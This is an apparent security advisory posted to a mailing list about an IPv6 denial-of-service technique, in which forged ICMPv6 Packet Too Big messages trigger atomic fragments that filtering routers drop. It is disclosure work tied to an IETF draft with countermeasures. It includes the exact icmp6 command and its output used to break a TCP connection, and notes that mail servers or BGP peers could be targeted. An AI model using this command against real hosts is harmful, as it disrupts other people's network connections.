SecurityvulnsSECURITYVULNS:DOC:31009DoS attacks (ICMPv6-based) resulting from IPv6 EH drops
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Folks,
Ten days ago or so we published this I-D:
<http://www.ietf.org/internet-drafts/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt>
Section 5.2 of the I-D discusses a possible attack vector based on a
combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by
operators, along with proposed countermeasures – but let me offer a
more informal and practical explanation:
1) It is known that filtering of packets containing IPv6 Extension
Headers (including the Fragment Header) is widespread (see our I-D above)
2) Let us assume that Host A is communicating with Server B, and that
some node filters fragments between Host A and Server B.
3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
MTU<1280), in the hopes of eliciting "atomic fragments" (see
<http://tools.ietf.org/rfc/rfc6946.txt>) from now on.
4) Now server B starts sending IPv6 atomic fragments… And since they
include a frag header (and in '2)' above we noted that frags are dropped
on that path), these packets get dropped (i.e., DoS).
"Demo" with the icmp6 tool
(<http://www.si6networks.com/tools/ipv6toolkit>) – (some addresses have
been changed (anonymized), but it is trivial to pick a victim server…)
"2001:db8:1:10:0:1991:8:25" is the server, and
"2001:5c0:1000:a::840" is my own address):
- ---- cut here ----
***** First of all, I telnet to port 80 of the server, and
everything works as expected ****
fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25…
Connected to 2001:db8:1:10:0:1991:8:25.
Escape character is '^]'.
^CConnection closed by foreign host.
**** Now I send the forget ICMPv6 PTB****
fgont@satellite:~$ sudo icmp6 --icmp6-packet-too-big -d
2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::840 --mtu 1000 -o
80 -v
icmp6: Security assessment tool for attack vectors based on ICMPv6 error
messages
IPv6 Source Address: 2001:5c0:1000:a::840 (automatically selected)
IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25
IPv6 Hop Limit: 227 (randomized)
ICMPv6 Packet Too Big (Type 2), Code 0
Next-Hop MTU: 1000
Payload Type: IPv6/TCP (default)
Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected)
Destination Address: 2001:5c0:1000:a::840
Hop Limit: 237 (randomized)
Source Port: 80 Destination Port: 38189 (randomized)
SEQ Number: 734463213 (randomized) ACK Number: 866605720 (randomized)
Flags: A (default) Window: 18944 (randomized) URG Pointer: 0 (default)
Initial attack packet(s) sent successfully.
***** And now I try the same telnet command as above… but it fails,
because the frags from the server to me are getting dropped somewhere ****
fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25…
[timeout]
- ---- cut here ----
Of course, in this particular case we just "shot ourselves". But one
could do this to DoS connections between mailservers, etc.
A nice question is: what if e.g…
1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and
react (as expected) by generating atomic fragments, and,
2) These same BGP servers deem fragmentation as "harmful", and hence
drop such fragments
you could essentially DoS traffic between them.
JOIN US at the next edition of our "Hacking IPv6 Networks" training
course in Leipzig, Germany. : February 2-3, 2015.
More info available at:
<https://www.it-defense.de/en/it-defense-2015/trainings/hacking-ipv6-networks/>
Fernando Gont
SI6 Networks
e-mail: [email protected]
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBAgAGBQJT9oizAAoJEK4lDVUdTnSS9xIQAKaDyPAqxmtdzhKXOU1t3NqQ
JD4XAfXWe6FnJCpYwCfj7SQWCxYUUx+i06DXrKQu/7NM4Qwi+f/D41MTzc8a27rF
Mn9mKwhicgAJO8iOgxGfr5y/BfKg0RwyLhc7GSYZLT5AVeBwb02Zfs2NA1uQZ2ak
AaFJJw2kjFZv6ynsPQ8L7MDoA0ixTqXrUV81iz9Wug5jkMkUk9Fm9RdbbZiHIWe5
57Y13+ZYWHDDPySf6UrJaXGn/S3JaUsy1jY+QPOppl+grsKBtNMuDcCM0TkMLq+b
cAYM41bN3NtILSxd5R2EayecehQYa4qSBYOGf/JPE8j0LepH8Wp99LdKkldCZA0B
Ja85ZlbOz/kA1SCymDTvnIVA47Wt6TFItG1s0OhTrms0qEfs6Mu1hz8zuARL5eOF
PPtJbAnmWMAl4mKHbTJb2a7BCs5NtcBdknBPJWJhcoqfnRedSiOsUYpHjsmNMdQn
wzdAaCDaSz3bfWbK37WPeusjA2+GfS/28jP4dOK3g3kPTy/Oml4kLKKPQ+wP8eO5
/i3aXjCMAJ8R5A7mnqVygz1IVLacMq8NclyFV/seTEnMNTulvnNUitBNFf+loYA/
2+M5E+iAa/K1yeUcMoocZ+L3W+ml1yxgXE/50P0EOOHN7f/YK6Q+H2FHB45E0/wf
NpYbne5sFlb9xmOEiD4e
=YSDa
-----END PGP SIGNATURE-----